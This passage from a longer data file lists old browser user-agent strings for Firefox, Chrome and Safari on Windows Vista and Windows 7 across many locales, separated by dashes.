3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-MX; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b1) Gecko/20081007 Firefox/3.1b1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528+ (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; id; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 GTB6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2) Gecko/20100115 Firefox/3.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100105 Firefox/3.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sr; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; tr-TR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ca; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.16) Gecko/20101130 AskTbMYC/3.9.1.14019 Firefox/3.5.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6;MEGAUPLOAD 1.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/1.0.156.0 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.4 (KHTML, like Gecko) Chrome/3.0.194.0 Safari/531.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.5 Safari/532.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.227.0 Safari/532.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.246.0 Safari/532.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1025 Safari/532.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.1 Safari/532.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/6.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.370.0 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.999 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.9 (KHTML, like Gecko) Chrome/6.0.400.0 Safari/533.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.596.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.19 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.638.0 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.654.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.669.0 Safari/534.20 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.459.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) FirePHP/0.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.1b3;MEGAUPLOAD 1.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3;MEGAUPLOAD 1.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100405 Firefox/3.6.3plugin1 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100806 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b1) Gecko/20091014 Firefox/3.6b1 GTB5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a3pre) Gecko/20100306 Firefox3.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbBT5/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbCDS/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbCS2/3.9.1.14019 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbFXTV5/3.9.1.14019 Firefox/3.6.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.8) Gecko/20100722 AskTbADAP/3.9.1.14019 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 FirePHP/0.3 